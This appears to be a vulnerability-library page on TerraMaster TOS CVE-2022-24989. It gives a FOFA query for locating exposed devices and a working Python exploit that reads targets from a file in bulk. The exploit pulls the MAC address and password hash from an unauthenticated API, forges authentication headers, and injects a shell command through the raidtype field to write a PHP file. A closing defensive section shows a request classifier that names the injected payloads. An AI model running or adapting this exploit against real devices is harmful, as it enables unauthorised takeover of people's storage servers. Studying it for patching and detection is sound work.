TerraMaster TOS Command Execution Vulnerability CVE-2022-24989 – Xiaobai – Vulnerability Library – Security Library – NGC660 Security Lab


1. TerraMaster TOS Command Execution Vulnerability CVE-2022-24989

1.1. Vulnerability description

TerraMaster TOS has an information disclosure vulnerability: an attacker can use it to obtain sensitive information from the server and, combined with CVE-2022-24989, gain control of the server.

1.2. Affected versions

TerraMaster TOS < 4.2.31

1.3. FOFA query

"TerraMaster" && header="TOS"

1.4. Reproduction

The login page is shown below (screenshot):

Result of running the PoC (screenshot):

1.5. PoC

import time, requests, re, hashlib

def usage():
    print("""
    用法:python3 TerraMaster TOS 信息泄露漏洞+RCE.py
    前提:在脚本所在文件夹下放入:host.txt  目标

    """)

def poc_getinfo(target):
    # Step 1: the unauthenticated webNasIPS endpoint returns the device's MAC address
    # and password hash (ADDR / PWD fields) in its response body.
    print("[+]正则检测:{}".format(target))
    headers = {"User-Agent": "TNAS"}
    payload = target + "/module/api.php?mobile/webNasIPS"
    try:
        req = requests.get(url=payload, headers=headers, timeout=10).content.decode("utf-8")
        if "successful" in req:
            print("[+]存在信息泄露漏洞:{}".format(payload))
            print('    [-]泄露信息:' + req)
            with open("poc1_vul.txt", "a+", encoding="utf-8") as f:
                f.write(payload + '\n')
            poc_execute(req, target)
    except requests.RequestException:
        pass  # unreachable host or timeout: move on to the next target

def poc_execute(req, target):
    # Step 2: the last six characters of the MAC and the leaked PWD value are enough
    # to build the Authorization / Signature / Timestamp headers createRaid expects.
    print("[+]开始进行命令执行检测---")
    req = str(req)
    macs = re.findall(r"ADDR:(.*?)\\", req)
    pwds = re.findall(r"PWD:(.*?)\\", req)
    if not macs or not pwds:
        return  # response did not contain the expected fields
    mac = macs[0][-6:]
    authorization = pwds[0]
    timestamp = str(int(time.time()))
    signature = hashlib.md5((mac + timestamp).encode("utf-8")).hexdigest()
    # raidtype reaches a shell unsanitised; the PoC writes a phpinfo() file as proof.
    data = {"raidtype": ';echo "<?php phpinfo();?>">vuln.php', "diskstring": "XXXX"}
    headers = {"Authorization": authorization, "Signature": signature, "Timestamp": timestamp, "User-Agent": "TNAS"}
    payload = target + '/module/api.php?mobile/createRaid'
    req2 = requests.post(url=payload, headers=headers, data=data, timeout=10).content.decode("utf-8")
    if "successful" in req2:
        print("[+]命令执行成功,成功写入phpinfo文件,文件地址:{}".format(target + '/module/vuln.php'))

if __name__ == '__main__':
    usage()
    with open("host.txt", 'r', encoding="utf-8") as f:
        temp = f.readlines()
    for target in temp:  # one target URL per line; a URL list file works the same way
        target = target.strip().rstrip("/")
        poc_getinfo(target)
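As an added defensive example, not part of the original writeup: a small classifier over request records (method, URL, decoded POST body) in the shape a reverse proxy or WAF in front of TOS could provide, flagging probes of the webNasIPS disclosure endpoint and createRaid calls whose raidtype carries shell metacharacters. The record layout and the sample requests are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample records: (method, path+query, decoded POST body).
SAMPLE_REQUESTS = [
    ("GET", "/module/api.php?mobile/webNasIPS", ""),
    ("POST", "/module/api.php?mobile/createRaid", "raidtype=;id&diskstring=XXXX"),
    ("POST", "/module/api.php?mobile/createRaid", "raidtype=raid1&diskstring=sda,sdb"),
    ("GET", "/module/api.php?mobile/login", ""),
]

# Characters that let a value break out of the shell command createRaid builds.
SHELL_META = re.compile(r"[;&|`$<>()\n]")

def form_fields(body):
    """Parse an x-www-form-urlencoded body, splitting on '&' only so that a ';'
    inside a value survives (older parse_qs versions treat ';' as a separator)."""
    fields = {}
    for pair in body.split("&"):
        if "=" in pair:
            key, value = pair.split("=", 1)
            fields[unquote_plus(key)] = unquote_plus(value)
    return fields

def classify(method, url, body):
    """Return a list of finding strings for one request (empty if nothing notable)."""
    findings = []
    parts = urlsplit(url)
    if not parts.path.endswith("/module/api.php"):
        return findings
    action = parts.query.split("&", 1)[0]  # TOS puts the action first in the query string
    if action == "mobile/webNasIPS":
        findings.append("webNasIPS: unauthenticated info-disclosure endpoint probed")
    elif action == "mobile/createRaid" and method == "POST":
        raidtype = form_fields(body).get("raidtype", "")
        if SHELL_META.search(raidtype):
            findings.append("createRaid: shell metacharacters in raidtype=%r" % raidtype)
    return findings

def scan(records):
    """Return (index, finding) pairs for every notable request in records."""
    return [(i, f) for i, rec in enumerate(records) for f in classify(*rec)]

if __name__ == "__main__":
    for index, finding in scan(SAMPLE_REQUESTS):
        print(index, finding)
```

A legitimate createRaid call (record 2) produces no finding; pairing this with the TOS version check against 4.2.31 tells you whether a flagged request could have succeeded.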